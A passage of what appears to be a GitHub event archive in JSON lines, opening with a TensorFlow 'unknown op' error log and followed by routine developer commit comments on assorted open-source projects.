\"MutableDenseHashTableV2\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_INT64 } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_VARIANT } } }') for unknown op: MutableDenseHashTableV2\r\n2018-07-05 17:23:46.293410: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableDenseHashTable\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_INT64 } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_INT64 } } }') for unknown op: MutableDenseHashTable\r\n2018-07-05 17:23:46.293482: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableDenseHashTable\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_INT64 } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_FLOAT } } }') for unknown op: MutableDenseHashTable\r\n\r\n2018-07-05 17:23:46.293646: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableDenseHashTable\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_INT64 } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_DOUBLE } } }') for unknown op: MutableDenseHashTable\r\n2018-07-05 17:23:46.293841: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableDenseHashTable\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_STRING } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_FLOAT } } }') for unknown op: MutableDenseHashTable\r\n2018-07-05 17:23:46.293917: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableDenseHashTable\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_STRING } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_BOOL } } }') for unknown op: MutableDenseHashTable\r\n2018-07-05 17:23:46.293989: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableDenseHashTable\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_INT64 } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_BOOL } } }') for unknown op: MutableDenseHashTable\r\n2018-07-05 17:23:46.294161: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableDenseHashTable\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_INT64 } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_VARIANT } } }') for unknown op: MutableDenseHashTable\r\n2018-07-05 17:23:46.294259: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableHashTableOfTensorsV2\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_STRING } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_FLOAT } } }') for unknown op: MutableHashTableOfTensorsV2\r\n2018-07-05 17:23:46.294346: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableHashTableOfTensorsV2\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_STRING } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_INT64 } } }') for unknown op: MutableHashTableOfTensorsV2\r\n2018-07-05 17:23:46.294585: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableHashTableOfTensorsV2\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_INT64 } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_STRING } } }') for unknown op: MutableHashTableOfTensorsV2\r\n2018-07-05 17:23:46.294660: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableHashTableOfTensorsV2\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_STRING } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_BOOL } } }') for unknown op: MutableHashTableOfTensorsV2\r\n2018-07-05 17:23:46.294733: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableHashTableOfTensors\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_STRING } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_FLOAT } } }') for unknown op: MutableHashTableOfTensors\r\n2018-07-05 17:23:46.295535: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableHashTableOfTensors\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_STRING } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_INT64 } } }') for unknown op: MutableHashTableOfTensors\r\n2018-07-05 17:23:46.295658: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableHashTableOfTensors\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_INT64 } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_STRING } } }') for unknown op: MutableHashTableOfTensors\r\n2018-07-05 17:23:46.295731: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableHashTableOfTensors\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_STRING } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_BOOL } } }') for unknown op: MutableHashTableOfTensors\r\n2018-07-05 17:23:46.295941: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableHashTableV2\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_STRING } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_FLOAT } } }') for unknown op: MutableHashTableV2\r\n2018-07-05 17:23:46.296014: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableHashTableV2\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_STRING } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_INT64 } } }') for unknown op: MutableHashTableV2\r\n2018-07-05 17:23:46.296086: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableHashTableV2\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_INT64 } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_STRING } } }') for unknown op: MutableHashTableV2\r\n2018-07-05 17:23:46.296237: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableHashTableV2\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_STRING } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_BOOL } } }') for unknown op: MutableHashTableV2\r\n2018-07-05 17:23:46.296354: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableHashTableV2\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_INT64 } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_FLOAT } } }') for unknown op: MutableHashTableV2\r\n2018-07-05 17:23:46.296564: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableHashTableV2\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_INT64 } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_VARIANT } } }') for unknown op: MutableHashTableV2\r\n2018-07-05 17:23:46.296740: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"HashTableV2\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_STRING } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_DOUBLE } } }') for unknown op: HashTableV2\r\n2018-07-05 17:23:46.296897: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"HashTableV2\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_STRING } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_FLOAT } } }') for unknown op: HashTableV2\r\n2018-07-05 17:23:46.296984: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"HashTableV2\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_STRING } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_INT32 } } }') for unknown op: HashTableV2\r\n2018-07-05 17:23:46.297149: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"HashTableV2\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_STRING } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_INT64 } } }') for unknown op: HashTableV2\r\n2018-07-05 17:23:46.297235: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"HashTableV2\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_INT64 } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_STRING } } }') for unknown op: HashTableV2\r\n2018-07-05 17:23:46.297305: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"HashTableV2\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_INT64 } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_INT64 } } }') for unknown op: HashTableV2\r\n2018-07-05 17:23:46.297387: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"HashTableV2\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_INT64 } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_FLOAT } } }') for unknown op: HashTableV2\r\n2018-07-05 17:23:46.297560: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"HashTableV2\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_STRING } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_STRING } } }') for unknown op: HashTableV2\r\n2018-07-05 17:23:46.297866: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"HashTableV2\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_STRING } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_BOOL } } }') for unknown op: HashTableV2\r\n2018-07-05 17:23:46.297944: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"HashTableV2\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_INT32 } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_INT32 } } }') for unknown op: HashTableV2\r\n2018-07-05 17:23:46.298176: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"HashTable\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_STRING } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_DOUBLE } } }') for unknown op: HashTable\r\n2018-07-05 17:23:46.298250: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"HashTable\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_STRING } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_FLOAT } } }') for unknown op: HashTable\r\n2018-07-05 17:23:46.298319: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"HashTable\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_STRING } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_INT32 } } }') for unknown op: HashTable\r\n2018-07-05 17:23:46.298477: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"HashTable\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_STRING } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_INT64 } } }') for unknown op: HashTable\r\n2018-07-05 17:23:46.298547: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"HashTable\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_INT64 } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_STRING } } }') for unknown op: HashTable\r\n2018-07-05 17:23:46.298615: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"HashTable\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_INT64 } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_INT64 } } }') for unknown op: HashTable\r\n2018-07-05 17:23:46.298682: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"HashTable\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_INT64 } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_FLOAT } } }') for unknown op: HashTable\r\n2018-07-05 17:23:46.298952: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"HashTable\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_STRING } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_STRING } } }') for unknown op: HashTable\r\n2018-07-05 17:23:46.299033: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"HashTable\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_STRING } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_BOOL } } }') for unknown op: HashTable\r\n2018-07-05 17:23:46.299103: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"HashTable\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_INT32 } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_INT32 } } }') for unknown op: HashTable\r\n2018-07-05 17:23:46.299390: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"LookupTableImportV2\" device_type: \"CPU\"') for unknown op: LookupTableImportV2\r\n2018-07-05 17:23:46.299459: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"LookupTableImport\" device_type: \"CPU\"') for unknown op: LookupTableImport\r\n2018-07-05 17:23:46.299520: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"LookupTableExportV2\" device_type: \"CPU\"') for unknown op: LookupTableExportV2\r\n2018-07-05 17:23:46.299857: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"LookupTableSize\" device_type: \"CPU\"') for unknown op: LookupTableSize\r\n2018-07-05 17:23:46.299926: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"LookupTableInsertV2\" device_type: \"CPU\"') for unknown op: LookupTableInsertV2\r\n2018-07-05 17:23:46.300017: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"LookupTableInsert\" device_type: \"CPU\"') for unknown op: LookupTableInsert\r\n2018-07-05 17:23:46.300321: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"LookupTableFindV2\" device_type: \"CPU\"') for unknown op: LookupTableFindV2\r\n2018-07-05 17:23:46.300415: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"LookupTableFind\" device_type: \"CPU\"') for unknown op: LookupTableFind\r\n2018-07-05 17:23:46.300546: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"InitializeTableFromTextFile\" device_type: \"CPU\"') for unknown op: InitializeTableFromTextFile\r\n2018-07-05 17:23:46.300611: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"InitializeTableV2\" device_type: \"CPU\"') for unknown op: InitializeTableV2\r\n2018-07-05 17:23:46.300681: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"InitializeTable\" device_type: \"CPU\"') for unknown op: InitializeTable\r\n2018-07-05 17:23:46.323465: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"LookupTableExport\" device_type: \"CPU\"') for unknown op: LookupTableExport\r\n2018-07-05 17:23:46.324829: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"InitializeTableFromTextFileV2\" device_type: \"CPU\"') for unknown op: InitializeTableFromTextFileV2\r\n2018-07-05 17:23:46.325926: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"LookupTableSizeV2\" device_type: \"CPU\"') for unknown op: LookupTableSizeV2\r\n2018-07-05 17:23:46.326433: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableHashTable\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_STRING } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_FLOAT } } }') for unknown op: MutableHashTable\r\n2018-07-05 17:23:46.326671: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableHashTable\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_STRING } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_INT64 } } }') for unknown op: MutableHashTable\r\n2018-07-05 17:23:46.326806: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableHashTable\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_INT64 } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_STRING } } }') for unknown op: MutableHashTable\r\n2018-07-05 17:23:46.326928: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableHashTable\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_STRING } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_BOOL } } }') for unknown op: MutableHashTable\r\n2018-07-05 17:23:46.327564: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableHashTable\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_INT64 } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_FLOAT } } }') for unknown op: MutableHashTable\r\n2018-07-05 17:23:46.327812: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableHashTable\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_INT64 } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_VARIANT } } }') for unknown op: MutableHashTable\r\n```\r\n\r\n"}},"created_at":"2018-07-05T16:05:03Z"}
{"id":"7924190851","type":"CommitCommentEvent","actor":{"login":"zhiwenhuang"},"repo":{"name":"zhiwenhuang/audio-equalizer-chrome"},"payload":{"comment":{"id":29608918,"position":null,"line":null,"path":null,"commit_id":"bb534b5fbec59abe634dce888709f5a7fbd84a89","created_at":"2018-07-05T16:07:52Z","updated_at":"2018-07-05T16:07:52Z","author_association":"OWNER","body":"I added back the adjustments in the latest extension update. Thanks for the feedback!"}},"created_at":"2018-07-05T16:07:52Z"}
{"id":"7924193521","type":"CommitCommentEvent","actor":{"login":"michaelryancaputo"},"repo":{"name":"link108/test-108"},"payload":{"comment":{"id":29608925,"position":null,"line":null,"path":null,"commit_id":"0a6afd91f710f3f9e18145205d25378ac721441d","created_at":"2018-07-05T16:08:23Z","updated_at":"2018-07-05T16:08:23Z","author_association":"NONE","body":"nice work here ;)"}},"created_at":"2018-07-05T16:08:23Z"}
{"id":"7924193523","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29608926,"position":null,"line":null,"path":null,"commit_id":"4b2e61536b1aeb5335f73b751f19a0ed8f1fbad5","created_at":"2018-07-05T16:08:23Z","updated_at":"2018-07-05T16:08:23Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#jul-18](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#jul-18).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://jul-18-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-05T16:08:23Z"}
{"id":"7924205315","type":"CommitCommentEvent","actor":{"login":"Ralf9"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":29608946,"position":null,"line":null,"path":null,"commit_id":"5b24ee8334d09ec08594b2a238b6138a005e2086","created_at":"2018-07-05T16:10:32Z","updated_at":"2018-07-05T16:10:32Z","author_association":"CONTRIBUTOR","body":"> Man kanns aber auch gleich so lösen, dass die Schleife nur durchlaufen wird, solange die Startposition + mindestlänge des Protokolles <= Endeposition ist.\r\n\r\nWenn Du Dir ganz Sicher bist, daß damit das Restrisiko = 0 ist, dann kannst Du die Abfrage Repeat <20 gerne rausnehmen.\r\nIch kann dies nicht abschätzen.\r\n\r\n"}},"created_at":"2018-07-05T16:10:32Z"}
{"id":"7924208493","type":"CommitCommentEvent","actor":{"login":"pinpins"},"repo":{"name":"nemosminer/NemosMiner"},"payload":{"comment":{"id":29608955,"position":null,"line":null,"path":null,"commit_id":"0bd5ef235f89a049b78d43aabc22f1f168825070","created_at":"2018-07-05T16:11:07Z","updated_at":"2018-07-05T16:11:07Z","author_association":"NONE","body":"Thank you adding it so quickly"}},"created_at":"2018-07-05T16:11:07Z"}
{"id":"7924208536","type":"CommitCommentEvent","actor":{"login":"S3riousSam"},"repo":{"name":"batocera-linux/batocera.linux"},"payload":{"comment":{"id":29608956,"position":null,"line":null,"path":null,"commit_id":"044b91216cf3b564e3964ef0a7fc040c8b99ccb6","created_at":"2018-07-05T16:11:07Z","updated_at":"2018-07-05T16:11:07Z","author_association":"NONE","body":"Why was the mouse disabled in this emulator? What was the problem osbserved? (would not it be useful to describe \"why\" minimally?... I mean, it is the best place to find any explanations and maybe the only place)."}},"created_at":"2018-07-05T16:11:07Z"}
{"id":"7924209707","type":"CommitCommentEvent","actor":{"login":"DarkPhoenix10"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29608960,"position":null,"line":null,"path":null,"commit_id":"348222c54f3d643e013184e07b02d8957d446a02","created_at":"2018-07-05T16:11:20Z","updated_at":"2018-07-05T16:11:20Z","author_association":"MEMBER","body":"why didn't it remove the directory git pls"}},"created_at":"2018-07-05T16:11:20Z"}
{"id":"7924210152","type":"CommitCommentEvent","actor":{"login":"pinpins"},"repo":{"name":"nemosminer/NemosMiner"},"payload":{"comment":{"id":29608961,"position":null,"line":null,"path":null,"commit_id":"0bd5ef235f89a049b78d43aabc22f1f168825070","created_at":"2018-07-05T16:11:24Z","updated_at":"2018-07-05T16:11:24Z","author_association":"NONE","body":"Wondering if balloon and aergo are also part of NemosMiner"}},"created_at":"2018-07-05T16:11:24Z"}
{"id":"7924214108","type":"CommitCommentEvent","actor":{"login":"DarkPhoenix10"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29608974,"position":null,"line":null,"path":null,"commit_id":"348222c54f3d643e013184e07b02d8957d446a02","created_at":"2018-07-05T16:12:10Z","updated_at":"2018-07-05T16:12:10Z","author_association":"MEMBER","body":"why"}},"created_at":"2018-07-05T16:12:10Z"}
{"id":"7924214175","type":"CommitCommentEvent","actor":{"login":"bzang"},"repo":{"name":"webex/spark-js-sdk"},"payload":{"comment":{"id":29608975,"position":11,"line":132,"path":"packages/node_modules/@ciscospark/media-engine-webrtc/test/unit/lib/offer-answer.js","commit_id":"ec50b3e38d371be36ae0a575469625800d0183e8","created_at":"2018-07-05T16:12:10Z","updated_at":"2018-07-05T16:12:10Z","author_association":"CONTRIBUTOR","body":"I originally didn't have this code, but found out that I was just setting the `pc` reference to undefined. Turns out `pc` can still stay active in memory, which also means that the `on` event hooks can still fire and error out. This extra code is just a preventative measure to ensure no extra events that we hook in above fire on something that doesn't exist anymore.\r\n\r\nTook me a while to figure that one out as WDIO didn't give a clear error."}},"created_at":"2018-07-05T16:12:10Z"}
{"id":"7924217066","type":"CommitCommentEvent","actor":{"login":"DarkPhoenix10"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29608980,"position":null,"line":null,"path":null,"commit_id":"348222c54f3d643e013184e07b02d8957d446a02","created_at":"2018-07-05T16:12:42Z","updated_at":"2018-07-05T16:12:42Z","author_association":"MEMBER","body":"true tbh, i'll keep the directory then"}},"created_at":"2018-07-05T16:12:42Z"}
{"id":"7924218451","type":"CommitCommentEvent","actor":{"login":"tarehart"},"repo":{"name":"RLBot/RLBot"},"payload":{"comment":{"id":29608987,"position":5,"line":44,"path":"src/main/cs/RLBotDotNet/RLBotDotNet/Interface/RLBotInterface.cs","commit_id":"41e79f17ebab781df68beca984c4509cb3398ea9","created_at":"2018-07-05T16:12:57Z","updated_at":"2018-07-05T16:12:57Z","author_association":"COLLABORATOR","body":"Looks good, but don't forget field info!"}},"created_at":"2018-07-05T16:12:57Z"}
{"id":"7924222494","type":"CommitCommentEvent","actor":{"login":"Boxtygit"},"repo":{"name":"Judycai12/cipher"},"payload":{"comment":{"id":29609005,"position":null,"line":null,"path":null,"commit_id":"1e2feedb375f77e08be6810a95fc1694efb21a57","created_at":"2018-07-05T16:13:42Z","updated_at":"2018-07-05T16:13:42Z","author_association":"NONE","body":"Hi, team , in the code for a foursquare cipher above, at the start of the program the import command is used to import from your package aca.ciphers the pair command but it responds with a cannot resolve pair to a type in eclispe che, how do we resolve this and get it to recognise the pair command."}},"created_at":"2018-07-05T16:13:42Z"}
{"id":"7924223061","type":"CommitCommentEvent","actor":{"login":"ronshapiro"},"repo":{"name":"google/dagger"},"payload":{"comment":{"id":29609008,"position":10,"line":59,"path":"util/deploy-to-maven-central.sh","commit_id":"614b426d7d8db700e19b1d86f204b3fa1205f2e4","created_at":"2018-07-05T16:13:49Z","updated_at":"2018-07-05T16:13:49Z","author_association":"NONE","body":"The `sed` works because I used single quotes. \r\n\r\nYou're right about git commit needing `-a`. Thanks for the patch!"}},"created_at":"2018-07-05T16:13:49Z"}
{"id":"7924229574","type":"CommitCommentEvent","actor":{"login":"garyskeete"},"repo":{"name":"garyskeete/linux-modder.github.io"},"payload":{"comment":{"id":29609024,"position":null,"line":null,"path":null,"commit_id":"3bb4a21ca161c61c68702d47bc5c236f7076681c","created_at":"2018-07-05T16:15:01Z","updated_at":"2018-07-05T16:15:01Z","author_association":"OWNER","body":"Schroedingers cat is exhibiting representation of resuscitation the actual fact that a biology specimen can be dead but have the properties to be resuscitated internally so apoptosis and homeostasis \r\nAlso changing states of matter\r\nAnd teleportation of starlight power sans heat magnification of power 0,1 binary and qubit entanglement and teleportation"}},"created_at":"2018-07-05T16:15:01Z"}
{"id":"7924231968","type":"CommitCommentEvent","actor":{"login":"tarehart"},"repo":{"name":"RLBot/RLBot"},"payload":{"comment":{"id":29609031,"position":13,"line":62,"path":"src/main/cs/RLBotDotNet/RLBotDotNet/Manager/BotManager.cs","commit_id":"41e79f17ebab781df68beca984c4509cb3398ea9","created_at":"2018-07-05T16:15:27Z","updated_at":"2018-07-05T16:15:27Z","author_association":"COLLABORATOR","body":"This is definitely debatable, but you might want to catch Exception in a second block below this and print it. If a bot maker has an unhandled exception coming from their own code during a tournament, they would probably appreciate not crashing in the middle of the match (even though arguably it's their responsibility to handle their own exceptions)."}},"created_at":"2018-07-05T16:15:27Z"}
{"id":"7924238851","type":"CommitCommentEvent","actor":{"login":"bartemanuel"},"repo":{"name":"bartemanuel/sample-cloud-native-toolchain-tutorial-20180703182720004"},"payload":{"comment":{"id":29609052,"position":null,"line":null,"path":null,"commit_id":"cdb38caa7da4b30508be0fc9afa7ffc301787112","created_at":"2018-07-05T16:16:45Z","updated_at":"2018-07-05T16:16:45Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/7632eb0c-c808-469e-8e43-a942346cee8d?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180703182720004\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/39741228-5022-4e53-8552-d6d9e814fb93?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180703182720004\") deployed [sample-cloud-native-toolchain-tutorial-20180703182720004](https://github.com/bartemanuel/sample-cloud-native-toolchain-tutorial-20180703182720004/releases/tag/deploy-ibm-yp-us-south-emanuelb-us.ibm.com-test-20180705-161644 \"deploy-ibm-yp-us-south-emanuelb-us.ibm.com-test-20180705-161644\") to [test](https://console.bluemix.net/apps/5eb4f7f9-98ba-4fe8-ae3a-aad2a44fcbb9?env_id=ibm:yp:us-south \"ibm:yp:us-south:emanuelb@us.ibm.com:test\"), including this commit"}},"created_at":"2018-07-05T16:16:45Z"}
{"id":"7924239651","type":"CommitCommentEvent","actor":{"login":"greg-1-anderson"},"repo":{"name":"greg-1-anderson/gk-8"},"payload":{"comment":{"id":29609056,"position":null,"line":null,"path":null,"commit_id":"d853da999a85c0ef0548be698a807e0089844e4e","created_at":"2018-07-05T16:16:54Z","updated_at":"2018-07-05T16:16:54Z","author_association":"OWNER","body":"Created multidev environment [gk-8#pr-depsupda](https://dashboard.pantheon.io/sites/5cbd78f8-3a96-492a-beb0-f892421708d8#pr-depsupda).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-depsupda-gk-8.pantheonsite.io/)"}},"created_at":"2018-07-05T16:16:54Z"}
{"id":"7924241081","type":"CommitCommentEvent","actor":{"login":"Blaisorblade"},"repo":{"name":"lampepfl/dotty"},"payload":{"comment":{"id":29609058,"position":null,"line":null,"path":null,"commit_id":"94b2d8106019067ea2890702c63f39578db06662","created_at":"2018-07-05T16:17:11Z","updated_at":"2018-07-05T16:17:11Z","author_association":"CONTRIBUTOR","body":"Thanks. That's a good reason (modulo JGit bugs), not sure I should bother trying to setup a fallback."}},"created_at":"2018-07-05T16:17:11Z"}
{"id":"7924241887","type":"CommitCommentEvent","actor":{"login":"DarkPhoenix10"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29609061,"position":null,"line":null,"path":null,"commit_id":"348222c54f3d643e013184e07b02d8957d446a02","created_at":"2018-07-05T16:17:20Z","updated_at":"2018-07-05T16:17:20Z","author_association":"MEMBER","body":"why are we communicating via github > discord"}},"created_at":"2018-07-05T16:17:20Z"}
